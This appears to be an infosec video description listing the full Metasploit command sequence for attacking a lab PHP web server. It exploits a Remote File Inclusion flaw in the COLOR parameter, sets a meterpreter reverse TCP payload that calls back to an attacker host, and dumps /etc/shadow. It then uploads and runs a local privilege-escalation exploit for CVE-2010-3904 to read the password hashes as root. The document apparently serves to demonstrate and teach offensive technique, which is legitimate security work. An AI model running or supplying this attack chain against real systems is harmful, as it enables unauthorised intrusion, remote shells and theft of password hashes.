Description: Target : http://192.168.178.47/test/index.php
COLOR variable is vulnerable to Remote File Inclusion
Metasploit commands :
use exploit/unix/webapp/php_include
show options
set PATH /test/
set PHPURI /index.php?COLOR=XXpathXX
set RHOST 192.168.178.47
ifconfig
set SRVHOST 192.168.178.21
show options
set PAYLOAD php/meterpreter_reverse_tcp
show options
set LHOST 192.168.178.21
exploit
getuid
getpid
ps
sysinfo
pwd
ls
cat index.php
cat /etc/shadow
lwpd
lcd /home/eromang/exploits/linux/local_escalations
upload linux-rds-exploit_CVE-2010-3904
execute -i -f bash
id
chmod u+x linux-rds-exploit_CVE-2010-3904
./linux-rds-exploit_CVE-2010-3904
id
cat /etc/shadow
Tags: metasploit , rfi , privilege escalation , php ,
Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying.